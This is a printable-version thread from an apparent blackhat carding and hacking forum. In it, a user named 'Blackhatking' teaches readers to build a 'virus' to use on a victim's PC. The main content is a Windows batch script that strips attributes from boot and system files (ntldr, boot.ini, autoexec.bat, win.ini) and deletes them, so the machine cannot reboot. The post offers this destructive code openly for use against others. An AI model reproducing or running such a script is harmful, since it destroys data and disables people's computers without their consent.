Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
Shut Down Any VICTIM's PC - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Hacking and Cracking Zone (https://bhcforums.cc/Forum-Hacking-and-Cracking-Zone)
+--- Forum: Hacking (https://bhcforums.cc/Forum-Hacking)
+--- Thread: Shut Down Any VICTIM's PC (/Thread-Shut-Down-Any-VICTIM-s-PC)



Shut Down Any VICTIM's PC - Blackhatking - 02-10-2020

Hi friends! Today I will teach you to create a virus that will shutdown the computer forever. Remember, this is not a prank. Don't run this virus on your own computer. Firstly, open a notepad and type the following-

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now save this as (anything).bat .

Please don't double click this file in your computer.
This file shut down the computer. It shuts the computer off and deletes the files required to reboot and restart.